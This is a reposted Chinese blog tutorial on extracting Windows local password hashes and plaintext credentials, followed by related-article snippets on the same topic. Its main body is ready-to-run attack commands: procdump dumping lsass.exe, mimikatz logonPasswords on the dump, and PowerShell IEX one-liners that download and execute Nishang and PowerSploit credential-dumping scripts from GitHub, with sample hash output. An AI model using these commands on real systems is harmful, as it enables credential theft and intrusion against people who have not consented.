windows本地hash值获取和破解详解

最新推荐文章于 2022-12-25 18:42:45 发布
最新推荐文章于 2022-12-25 18:42:45 发布
阅读量410 收藏 1
点赞数
原文链接:http://www.cnblogs.com/xiaozi/p/8677351.html
版权

 

 powershell版的procdump

https://www.t00ls.net/articles-48428.html

 

procdump

procdump是微软官方提供的一个小工具,

微软官方下载地址:https://technet.microsoft.com/en-us/sysinternals/dd996900

将工具拷贝到目标机器上执行如下命令(需要管理员权限,我选择的版本是64位)

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp

 

将这个内存dump文件拷贝到mimikatz同目录下,双击打开mimikatz执行情况如图:

mimikatz # sekurlsa::minidump lsass.dmp

Switch to MINIDUMP

mimikatz # sekurlsa::logonPasswords full

 

powershell Dump the hash

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

 

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

 

 

执行powershell版的Mimikatz获取明文密码

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts

Powershell也可以完成像procdump一样的工作,获取某个进程的dumps。这里演示获取lsass.exe的dumps,然后再用Mimikatz从dumps中获取明文。

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); "Get-Process lsass | Out-Minidump"

参考链接:利用Powershell 读取hash https://www.secpulse.com/archives/6367.html

 

转载于:https://www.cnblogs.com/xiaozi/p/8677351.html

an0708
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows系统管理员账号密码Hash哈希解密工具
11-06
在线解密Windows系统管理员账号密码Hash哈希。 至于获取Hash百度有方法,本工具可以解密你得到的Hash
获取本机 hash(注册表)
weixin_30562507的博客
05-11 281
Windows 2000:regedit /e d:\aa.reg “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” Windows 2003:reg export “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” d:\aa.reg 注意权限问题,一般注册表默认sam目...
获取win10的hash
01-08
powershell路劲:C:\Windows\System32\WindowsPowerShell\v1.0 记住powershell要以管理员运行 win10密码文件:C:\Windows\System32\config\SAM powershell上输入 get-filehash d:\module.txt -algorithm md5 也可以在cmd上破解 certutil -hashfile d:\module.txt md5 Hash算法有:MD2、MD4、MD5、SHA1、SHA256、SHA384、SHA512 PowerShell同样可以运行certutil -hashfil
Win本地hash概念
小刚的博客
08-03 700
转载https://www.secpulse.com/archives/65256.html Windows系统使用两种方法对用户的密码进行哈希处理 它们分别是LAN Manager(LM)哈希和NT LAN Manager(NTLM)哈希。 所谓哈希(hash),就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。现在已经有了更新的NTLMv2以及Kerberos验证体系。 Windows加密过的密码口令,我们称之为has.
多种姿势抓取windows系统的hash
p_utao的博客
09-12 4969
hashdump抓取密码 从目标机中提取hash破解hash就可获得账号密码,计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要访问就必须有系统级账号,所以要使用该命令就必须进行权限提升 在shell提示符下输入hashdump命令,将导出目标机sam数据库中的hash meterpreter > hashdump Administrator:500:44efce164ab921caaad3b435b5140
python利用标准库如何获取本地IP示例详解
09-21
### Python 利用标准库获取本地 IP 地址详解 #### 标准库简介 Python 标准库是 Python 语言的重要组成部分之一,它提供了一系列内置模块和工具,可以帮助开发者轻松地实现各种功能,无需从零开始编写代码。Python ...
关于64位windows系统HASH的抓取.pdf
12-22
Windows 64 位系统 HASH 抓取技术详解 Hash 抓取是 Windows 系统安全领域中一个重要的话题。随着 Windows Vista 版本的发布,Microsoft 已经不再保存 LM Hash,这使得传统的 Hash 抓取工具如 PwDump、Gsecdump、...
FTP下载和命令详解.pdf
07-14
dir`命令可以查看本地当前目录下的文件和目录。 8. 关闭交互提示:`prompt`命令可以开启或关闭交互模式。在关闭交互模式后,使用`mget`等命令时不会出现确认提示。 9. 下载文件:`mget *.*`命令会下载FTP服务器...
第一百零五课:windows 单机免杀抓明文或hash [通过dump lsass进程数据]1
08-03
### 知识点详解 #### 1. 抓取明文密码的前提条件 - **管理权限获取**:在抓取明文密码之前,攻击者必须已经获得了目标机器的管理权限。这通常涉及到对系统的深入访问控制,使得攻击者能够执行需要较高权限的操作。...
Redis安装配置详解.pdf
最新发布
03-28
Redis提供了丰富的数据结构支持,如字符串(string)、哈希(hash)、列表(list)、集合(set)和有序集合(sorted set)。这些特性使得Redis不仅可以用作简单的键存储,还可以用来解决复杂的数据处理问题。 ...
内网渗透-获取WIN本地用户Hash
小刚的博客
10-27 2423
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 WIN本地获取Hashwin系统密码为什么要获取本地hash几种工具和获取方式注册表 + mimikatzProcdump + mimikatz直接mimikatz读取密码 win系统密码 Windows系统使用LM和NTLM两种方法对用户的密码进行加密处理, 两种密码的加密方式在这有介绍Win本地hash概念 但注意的是从win-server-2008开始默认禁止使用LM加密方式,统一使用NT.
windows密码破解(哈希破解技术)
weixin_45511599的博客
10-13 5813
一.windows密码与哈希 1.我们用于登录的windows密码,在windows系统中会进行加密。一般密码加密文件储存在c盘的windows\system32\config目录下,文件名是SAM文件。在system目录下有两个非常重要的文件 A.SAM文件:储存着windows密码,使用LM或者NT算法加密成明文哈希,再由syskey加密成乱码的二次密文 B.SYSTEM文件:密钥文件,有一个程序syskey,对上面的SAM文件进行第一次的解密,解密成明文的哈希 我们使用反编译技术就可以获得密码 二.
后渗透攻击(三)
hmysn的博客
12-25 2798
在进行提权后我们的操作空间就会大很多,可以进行一系列的创建新账户、获取账号密码、远程操控屏幕等等的操作。该文章就对一些常用的操作进行了整理。
获取windows hash的几种方式
lansefly1990的专栏
02-26 6588
一、windows hash介绍 NTML hash是指在windows系统下的Security Account Manager中保存的用户密码hashhash的生成方法: 将明文口令转换成十六进制的格式; 转换成Unicode格式,即在每个字节之后添加0x00; 对Unicode字符串作MD4加密,生成32位的十六进制数字串; 如测试测试密码为haha123 转成十六进制为:...
本地hash远程攻击
Au
11-20 389
1.通过mimikatz读取管理员密码 下载地址 : dl.pconline.com.cn/download/615028.html  最新版本2.1.1    作者说支持 win10 但是我本地测试没有抓到明文     这里演示 Windows Server 2003  32位 操作命令:   1.1    privilege::debug  //提升权限   1.2   se...
还原哈希密码工具(hash、md5)
墨痕诉清风的博客
02-01 5154
工具:hash-identifier HASH:734998das87d987asd79a7sd87as9 工具:john 如果以前运行过同样的文件命令,需要删除以前的文件(rm -rf/root/.john/*) username:passhash ---------> a.txt(格式) john --format=raw-MD5 a.txt ...
Windows server 2012 用户hash抓取方法研究(本地+域)
Coisini的博客
06-16 2150
为避免文章过长,这里就不贴出详细测试过程了。经过我的测试,发现本地用户hash抓取的方法中,以下几种方式是可行的: 注册表导出+cain Pwdump7.exe QuarksPwDump.exe mimikatz.exe 这几种方式都可以抓到本地用户hash,其中mimikatz.exe只能抓到登陆过的账户的hash, 已经抓取不到明文的密码了,但是,有一些有意思的东西,直接上图: 仔细看图...
Windows LM-Hash与NTLM-Hash详解及Python模拟
Windows操作系统中,身份验证过程涉及到两种主要的哈希算法:LM (Lan Manager) Hash 和 NTLM (NT LAN Manager) Hash。这两种算法在早期版本的Windows系统中用于存储用户的密码,以确保密码的安全性。尽管现在NTLM ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值